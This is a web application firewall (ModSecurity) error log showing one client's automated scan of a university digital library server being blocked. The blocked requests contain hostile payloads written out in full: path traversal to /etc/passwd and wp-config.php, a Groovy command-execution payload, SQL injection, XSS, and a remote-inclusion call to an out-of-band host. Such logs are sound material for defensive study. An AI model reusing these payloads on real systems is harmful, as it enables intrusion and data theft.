[Tue Aug 29 11:47:51.435246 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "digilibft.unla.ac.id"] [uri "/_search"] [unique_id "ZO14d8Co-f0AAAjbw3QAAAAW"]
[Tue Aug 29 11:47:51.440481 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAkdu4MAAAAO"]
[Tue Aug 29 11:47:52.465759 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAjCbL8AAAAB"]
[Tue Aug 29 11:47:52.607992 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14eMCo-f0AAAjbw3gAAAAW"]
[Tue Aug 29 11:47:53.406305 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAjdQQsAAAAZ"]
[Tue Aug 29 11:47:56.488539 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAjav5oAAAAV"]
[Tue Aug 29 11:47:57.438548 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAhl0NUAAAAi"]
[Tue Aug 29 11:47:58.408892 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAhl0NgAAAAi"]
[Tue Aug 29 11:47:58.470616 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAjCbNMAAAAB"]
[Tue Aug 29 11:47:59.353578 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14f8Co-f0AAAkaDAUAAAAJ"]
[Tue Aug 29 11:48:02.482742 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14gsCo-f0AAAkdu68AAAAO"]
[Tue Aug 29 11:48:03.368066 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAhui-wAAAAr"]
[Tue Aug 29 11:48:04.427413 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAj12BUAAAAa"]
[Tue Aug 29 11:48:05.404812 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hcCo-f0AAAjCbOMAAAAB"]
[Tue Aug 29 11:48:05.427383 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibft.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAkaDBUAAAAJ"]
[Tue Aug 29 11:48:06.396679 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAkdu8YAAAAO"]
[Tue Aug 29 11:48:06.422645 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAkNPtEAAAAI"]
[Tue Aug 29 11:48:07.652561 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAkAL@8AAAAU"]
[Tue Aug 29 11:48:08.379087 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAjy56EAAAAG"]
[Tue Aug 29 11:48:09.421893 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAjbw78AAAAW"]
[Tue Aug 29 11:48:09.481426 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAjYrC8AAAAK"]
[Tue Aug 29 11:48:11.396228 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAkksIkAAAAA"]
[Tue Aug 29 11:48:12.357090 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAkoTfoAAAAH"]
[Tue Aug 29 11:48:12.750659 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAfWN5AAAAAL"]
[Tue Aug 29 11:48:12.868966 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilibft.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jMCo-f0AAAfWN5YAAAAL"]
[Tue Aug 29 11:48:12.869018 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilibft.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jMCo-f0AAAfWN5YAAAAL"]
[Tue Aug 29 11:48:17.776060 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14kcCo-f0AAAkAMEoAAAAU"]
[Tue Aug 29 11:48:18.458642 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14ksCo-f0AAAfWN70AAAAL"]
[Tue Aug 29 11:48:21.390941 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAkrz6QAAAAC"]
[Tue Aug 29 11:48:21.517208 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAjM7LIAAAAT"]
[Tue Aug 29 11:48:21.679449 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAjYrEsAAAAK"]
[Tue Aug 29 11:48:22.415253 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAjtc@UAAAAX"]
[Tue Aug 29 11:48:23.876029 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gbpjkx8h7ozt95.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gbpjkx8h7ozt95.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14l8Co-f0AAAkrz7sAAAAC"]
[Tue Aug 29 11:48:23.918771 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAkrz70AAAAC"]
[Tue Aug 29 11:48:27.867073 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14m8Co-f0AAAkwQRYAAAAS"]
